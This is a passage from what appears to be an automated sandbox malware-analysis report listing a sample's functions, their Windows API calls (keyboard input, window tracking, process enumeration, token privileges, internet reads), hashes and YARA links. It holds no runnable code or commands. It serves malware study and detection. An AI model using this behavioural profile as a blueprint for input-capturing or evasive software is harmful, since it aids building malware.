            • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00FC6D71,00000000,00000000,00FC82D9,?,00FC82D9,?,00000001,00FC6D71,8BE85006,00000001,00FC82D9,00FC82D9), ref: 00FDD910
            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00FDD999
            • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00FDD9AB
            • __freea.LIBCMT ref: 00FDD9B4
              • Part of subcall function 00FD3820: RtlAllocateHeap.NTDLL(00000000,?,01071444,?,00FBFDF5,?,?,00FAA976,00000010,01071440,00FA13FC,?,00FA13C6,?,00FA1129), ref: 00FD3852
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
            • String ID:
            • API String ID: 2652629310-0
            • Opcode ID: 7c5bcf04e2268dd431ad59202d4172887d1bb7742def01a198e50e304c9cd0ea
            • Instruction ID: d1003c2b6eca9e9bc76528bc18049236f4a682dbb909cafd2611d5e6e46f0d3b
            • Opcode Fuzzy Hash: 7c5bcf04e2268dd431ad59202d4172887d1bb7742def01a198e50e304c9cd0ea
            • Instruction Fuzzy Hash: E931D872A0020AABDF25DF65DC51EAE7BA6EF41310F094169FC04D7250D73ADD50EB91
            Function 0100AA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON
            Download Yara Rule
            APIs
            • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0100AAAC
            • SetKeyboardState.USER32(00000080), ref: 0100AAC8
            • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0100AB36
            • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0100AB88
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: KeyboardState$InputMessagePostSend
            • String ID:
            • API String ID: 432972143-0
            • Opcode ID: fe89489e5354729bc3174719075986ff103eadfd48a7a35c2e02b31a2a47cf1c
            • Instruction ID: 84ac4abfa5a7c1491404b67609752f4360d8b454841afc4ab6e6724ff7e39b4f
            • Opcode Fuzzy Hash: fe89489e5354729bc3174719075986ff103eadfd48a7a35c2e02b31a2a47cf1c
            • Instruction Fuzzy Hash: 67311831B40B48EEFF378A688804BFE7BEAAB45310F04465AE1C5971D2D779C681C761
            Function 010352C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON
            Download Yara Rule
            APIs
            • SendMessageW.USER32(?,00001024,00000000,?), ref: 01035352
            • GetWindowLongW.USER32(?,000000F0), ref: 01035375
            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 01035382
            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 010353A8
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: LongWindow$InvalidateMessageRectSend
            • String ID:
            • API String ID: 3340791633-0
            • Opcode ID: 4974469a0ada8010e0e7dded0da2ecb3b908fdf401e9eee69c45b3f82f2b50c7
            • Instruction ID: ee6806f5e2f322ac5ef9efbd109b0972b8f21278de6c570786d09d6c9457814c
            • Opcode Fuzzy Hash: 4974469a0ada8010e0e7dded0da2ecb3b908fdf401e9eee69c45b3f82f2b50c7
            • Instruction Fuzzy Hash: 6C31C434A55208EFFB748A18CC05BE83BADEB85310F48C542FBD0961F1C7B5A940DB42
            Function 01037674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON
            Download Yara Rule
            APIs
            • ClientToScreen.USER32(?,?), ref: 0103769A
            • GetWindowRect.USER32(?,?), ref: 01037710
            • PtInRect.USER32(?,?,01038B89), ref: 01037720
            • MessageBeep.USER32(00000000), ref: 0103778C
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Rect$BeepClientMessageScreenWindow
            • String ID:
            • API String ID: 1352109105-0
            • Opcode ID: c003c788acb224638215a1322e6394e4765c1e95010186a7945d9ea8007daed2
            • Instruction ID: 2415e2f8e87c243ebfc7d94ea70963e1558a0aa42ecf8db66fde6ba52c24f0bd
            • Opcode Fuzzy Hash: c003c788acb224638215a1322e6394e4765c1e95010186a7945d9ea8007daed2
            • Instruction Fuzzy Hash: 4041B1B4A01209EFDB22CF58C484EA97BF8FF89310F1440A9E594EB295C331E942CF90
            Function 010316DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON
            Download Yara Rule
            APIs
            • GetForegroundWindow.USER32 ref: 010316EB
              • Part of subcall function 01003A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 01003A57
              • Part of subcall function 01003A3D: GetCurrentThreadId.KERNEL32 ref: 01003A5E
              • Part of subcall function 01003A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,010025B3), ref: 01003A65
            • GetCaretPos.USER32(?), ref: 010316FF
            • ClientToScreen.USER32(00000000,?), ref: 0103174C
            • GetForegroundWindow.USER32 ref: 01031752
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
            • String ID:
            • API String ID: 2759813231-0
            • Opcode ID: a2ae6867608d0c6701d18bedac4caaee53af53dea31c2dc2277a1ca8fb5962f7
            • Instruction ID: 31c3919be703355db41cd2740bfb142b27e8a5d535f0b1f331acb755c1d5d835
            • Opcode Fuzzy Hash: a2ae6867608d0c6701d18bedac4caaee53af53dea31c2dc2277a1ca8fb5962f7
            • Instruction Fuzzy Hash: DD3152B1D00209AFD701EFA9C881CAEBBFDFF89204B5480AAE455E7201D7359E45CBA0
            Function 0100D4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
            Download Yara Rule
            APIs
            • CreateToolhelp32Snapshot.KERNEL32 ref: 0100D501
            • Process32FirstW.KERNEL32(00000000,?), ref: 0100D50F
            • Process32NextW.KERNEL32(00000000,?), ref: 0100D52F
            • CloseHandle.KERNEL32(00000000), ref: 0100D5DC
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
            • String ID:
            • API String ID: 420147892-0
            • Opcode ID: ee8eeb6fa372d842dec77f7900f183f13fe25ec3680b4a433d445d3b6687cb35
            • Instruction ID: 58ad378abd13e53a4b882cb7c715e9668f270e4f1d833d470ff6b49819197055
            • Opcode Fuzzy Hash: ee8eeb6fa372d842dec77f7900f183f13fe25ec3680b4a433d445d3b6687cb35
            • Instruction Fuzzy Hash: 0631A4711083009FE311EF94CC81AAFBBF8EF9A354F54052DF5C1921A1EB76A549DBA2
            Function 01038FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00FB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00FB9BB2
            • GetCursorPos.USER32(?), ref: 01039001
            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00FF7711,?,?,?,?,?), ref: 01039016
            • GetCursorPos.USER32(?), ref: 0103905E
            • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00FF7711,?,?,?), ref: 01039094
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Cursor$LongMenuPopupProcTrackWindow
            • String ID:
            • API String ID: 2864067406-0
            • Opcode ID: 958a96e7b324032596c7c220240facd5cfe980b584defaf557047ac9b8d959c1
            • Instruction ID: 7d7707a0947e308d1edf78dc8d2b7539984175d14a83a4cb2de8f8030740d47e
            • Opcode Fuzzy Hash: 958a96e7b324032596c7c220240facd5cfe980b584defaf557047ac9b8d959c1
            • Instruction Fuzzy Hash: 9121BF35600118FFEB658F98C958EEABBFDFB89350F004095FA85972A1C3769990DB60
            Function 0100D2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
            Download Yara Rule
            APIs
            • GetFileAttributesW.KERNEL32(?,0103CB68), ref: 0100D2FB
            • GetLastError.KERNEL32 ref: 0100D30A
            • CreateDirectoryW.KERNEL32(?,00000000), ref: 0100D319
            • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0103CB68), ref: 0100D376
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: CreateDirectory$AttributesErrorFileLast
            • String ID:
            • API String ID: 2267087916-0
            • Opcode ID: 1925590e7977c7a9b8d5f262469671695e0687d3f29de73c24b95aba4704042c
            • Instruction ID: 06c69fbd6c13244ae8d48634c02bbf41c2ee59c6d1f56dae787ff910dbaf4423
            • Opcode Fuzzy Hash: 1925590e7977c7a9b8d5f262469671695e0687d3f29de73c24b95aba4704042c
            • Instruction Fuzzy Hash: 2021D3705083019FE311DFA8C98046EBBE8EE46364F108A5EF4D9D72D1DB35D905CBA2
            Function 01001571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 01001014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0100102A
              • Part of subcall function 01001014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 01001036
              • Part of subcall function 01001014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 01001045
              • Part of subcall function 01001014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0100104C
              • Part of subcall function 01001014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 01001062
            • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 010015BE
            • _memcmp.LIBVCRUNTIME ref: 010015E1
            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01001617
            • HeapFree.KERNEL32(00000000), ref: 0100161E
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
            • String ID:
            • API String ID: 1592001646-0
            • Opcode ID: 6d3e3c0f09ad544590d60cf56a080b203fb2caed768745c9836b161b3a86326e
            • Instruction ID: cbd746083174dff3c4652eb5965d12fa38851f76bed4d4fcae4c4a842e0523c0
            • Opcode Fuzzy Hash: 6d3e3c0f09ad544590d60cf56a080b203fb2caed768745c9836b161b3a86326e
            • Instruction Fuzzy Hash: BA215A31E00109ABEB11CFA8C945BEEBBF8EF45355F084499E581AB280D775AA45DB50
            Function 01032782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
            Download Yara Rule
            APIs
            • GetWindowLongW.USER32(?,000000EC), ref: 0103280A
            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 01032824
            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 01032832
            • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 01032840
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Window$Long$AttributesLayered
            • String ID:
            • API String ID: 2169480361-0
            • Opcode ID: 089e4e6bbb1486e1f2992efbc470a2b25311407dbb84761065b08dcf6a63949f
            • Instruction ID: 5c560b4fea67f3d65e4f211f2850e82604225ab30d32177a6d284d23f694664a
            • Opcode Fuzzy Hash: 089e4e6bbb1486e1f2992efbc470a2b25311407dbb84761065b08dcf6a63949f
            • Instruction Fuzzy Hash: BA210331205511AFE715DB24C844FAA7B9DBF85324F188158F4A6CB6D2C776EC82C7D0
            Function 0101CE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON
            Download Yara Rule
            APIs
            • InternetReadFile.WININET(?,?,00000400,?), ref: 0101CE89
            • GetLastError.KERNEL32(?,00000000), ref: 0101CEEA
            • SetEvent.KERNEL32(?,?,00000000), ref: 0101CEFE
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ErrorEventFileInternetLastRead
            • String ID:
            • API String ID: 234945975-0
            • Opcode ID: c57e2d77b46a410761f70464dcde9f67ef1283ee98173fdd29a4fce5e36e3954
            • Instruction ID: 750b61618e72adbf5e0ec8af1a0c8ef439e9ca14bdc65816015fe7840fe80c5e
            • Opcode Fuzzy Hash: c57e2d77b46a410761f70464dcde9f67ef1283ee98173fdd29a4fce5e36e3954
            • Instruction Fuzzy Hash: 6421C1715403059BF730CF69CA49BABBBFCEB40314F10445EE686D2145E778EA048B50
            Function 010078F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 01008D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0100790A,?,000000FF,?,01008754,00000000,?,0000001C,?,?), ref: 01008D8C
              • Part of subcall function 01008D7D: lstrcpyW.KERNEL32(00000000,?), ref: 01008DB2
              • Part of subcall function 01008D7D: lstrcmpiW.KERNEL32(00000000,?,0100790A,?,000000FF,?,01008754,00000000,?,0000001C,?,?), ref: 01008DE3
            • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,01008754,00000000,?,0000001C,?,?,00000000), ref: 01007923
            • lstrcpyW.KERNEL32(00000000,?), ref: 01007949
            • lstrcmpiW.KERNEL32(00000002,cdecl,?,01008754,00000000,?,0000001C,?,?,00000000), ref: 01007984
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: lstrcmpilstrcpylstrlen
            • String ID: cdecl
            • API String ID: 4031866154-3896280584
            • Opcode ID: 14ad3d8c25a8fb57085e9240e242998749da4e0c320c70b92c23a904ab5cbeb6
            • Instruction ID: 0cd5ae192c6809971aa2db86fd7148201f7b778f8a53089170dd096e5fb3fb30
            • Opcode Fuzzy Hash: 14ad3d8c25a8fb57085e9240e242998749da4e0c320c70b92c23a904ab5cbeb6
            • Instruction Fuzzy Hash: 4A11D63A200242ABEB265F39D844D7A77E9FF45350F40402BE9C6C7294EB36D911D7A1
            Function 01035660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
            Download Yara Rule
            APIs
            • SendMessageW.USER32(?,00001060,?,00000004), ref: 010356BB
            • _wcslen.LIBCMT ref: 010356CD
            • _wcslen.LIBCMT ref: 010356D8
            • SendMessageW.USER32(?,00001002,00000000,?), ref: 01035816
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: MessageSend_wcslen
            • String ID:
            • API String ID: 455545452-0
            • Opcode ID: e602e6e4a9ee895441c1d13a3370fbfa4216dda3caf772c66cb1d15e342c302b
            • Instruction ID: 3e48cd72d7778bff36e4d8eb407da2bf7ecd63ad5efa41d71673895b0bee8027
            • Opcode Fuzzy Hash: e602e6e4a9ee895441c1d13a3370fbfa4216dda3caf772c66cb1d15e342c302b
            • Instruction Fuzzy Hash: 66112671A0021996EF60DF65DC81EEE3BBCEF85764F00406AFA85E6091EB74D640CB60
            Function 01001A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
            Download Yara Rule
            APIs
            • SendMessageW.USER32(?,000000B0,?,?), ref: 01001A47
            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 01001A59
            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 01001A6F
            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 01001A8A
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: MessageSend
            • String ID:
            • API String ID: 3850602802-0
            • Opcode ID: 96e76ae020fba85e8f19599c464fdef320bf9ed54aae169fa3d6f8c876ba21d7
            • Instruction ID: 001c4fd2210b0107c58153304eb0c505d0a67082ab1f1738ed0d0a5d200f2be1
            • Opcode Fuzzy Hash: 96e76ae020fba85e8f19599c464fdef320bf9ed54aae169fa3d6f8c876ba21d7
            • Instruction Fuzzy Hash: 9211FA3A900219FFEB119BA5C985FADBBB8EB09750F200091E644B7290D671AE50DB94
            Function 0100E1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
            Download Yara Rule
            APIs
            • GetCurrentThreadId.KERNEL32 ref: 0100E1FD
            • MessageBoxW.USER32(?,?,?,?), ref: 0100E230
            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0100E246
            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0100E24D
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
            • String ID:
            • API String ID: 2880819207-0
            • Opcode ID: fddd9876cc6a0ddb0a19329212a35789d035257168c5c5c0fbde23ddbc674ce2
            • Instruction ID: 6d0393d2dad57da9625022624b437a059ba7c03ebbec6bf270e4f63f06a23966
            • Opcode Fuzzy Hash: fddd9876cc6a0ddb0a19329212a35789d035257168c5c5c0fbde23ddbc674ce2
            • Instruction Fuzzy Hash: 82110872D04214BFE7129FA8DC09A9E7FACAB45214F00865AF954F32C4D2B9D90087A0
            Function 00FCD1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
            Download Yara Rule
            APIs
            • CreateThread.KERNEL32(00000000,?,00FCCFF9,00000000,00000004,00000000), ref: 00FCD218
            • GetLastError.KERNEL32 ref: 00FCD224
            • __dosmaperr.LIBCMT ref: 00FCD22B
            • ResumeThread.KERNEL32(00000000), ref: 00FCD249
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Thread$CreateErrorLastResume__dosmaperr
            • String ID:
            • API String ID: 173952441-0
            • Opcode ID: 6e637a21c4e15e8c54a42dd7d405be0c74d6557b7b54427fe2486843e3cc5cec
            • Instruction ID: 3671c630e9e7195eb2d05edb47cd4dc9f4183bd9271bdc97955e308ca70ada61
            • Opcode Fuzzy Hash: 6e637a21c4e15e8c54a42dd7d405be0c74d6557b7b54427fe2486843e3cc5cec
            • Instruction Fuzzy Hash: 1801D276805206BBDB215BA5DD0BFEE7A6DDF81330F20022EF925921D0CB75C905E7A0
            Function 00FA600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
            Download Yara Rule
            APIs
            • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00FA604C
            • GetStockObject.GDI32(00000011), ref: 00FA6060
            • SendMessageW.USER32(00000000,00000030,00000000), ref: 00FA606A
